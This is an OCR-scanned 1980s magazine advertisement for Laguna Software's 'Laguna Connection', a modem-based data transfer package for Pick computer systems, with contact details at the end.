Serial #: 
VICISSITUDE 


*Webster’s New Dictionary of Synonyms, 
G. & C. Merriam Co., 1978 










Economical, error-free transfer of data 
among remote Pick machines was 
finally provided last year by our new 
“Laguna Connection.” 

It offered a new dimension to Pick 
computing and it won the 1987 Pro- 
Gramme Award for “the Best Nonvertical 
Support Package of the Year.” 

We’re very proud of that. We’re also 
proud of the “vicissitude” it brought to 
the Pick community! 

For, if the truth be known, the Pick 
community has been reluctant to talk 
about communications. It was a sore 
spot. We had the RS 232 “wired” 


minicomputer years, of course, but we 
couldn’t match the micro-age communications 
of most other operating 
system environments. And we knew it. 

We’ve changed all that with the 
Laguna Connection. We can do more 
than match those other capabilities; we 
can beat them. 

The “Connection” offers asynchronous, 
point-to-point communication 
between any Pick-equipped system 
regardless of its vendor. It also provides 
spoke networks for every port in the 
system, and you can transfer as much 
data as you wish, any time you wish. 
Auto-dialing is a key feature, and there 
is no need to babysit the data transfer. 


Data movement is tracked and reported 
automatically. (The Laguna Connection’s 
users claim 100% reliability!) And it is 
economical. All that is needed with the 
“Connection” are modems and 
telephone lines. 

We believe we have more than 
changed the Pick communication 
picture. The Laguna Connection 
substitutes a modem communication 
system for an older one, and has 
completely reversed the Pick communication 
story. What was once a Pick negative, 
is now a Pick positive. With the 
Laguna Connection, Pick-based systems 
can now have the best communication 
capability available today. And that’s 
more than just a simple “change,” 
it’s vicissitude. 


“...a change so great as to seem a substitution for, 
or a reversal of, what has been.”* 


See for yourself. Call: 


(800) 437-6347 Toll-free U.S. or 
(714)494-1092 

Laguna Software 
$80-117 Broadway 
Laguna Beach, CA 92651 











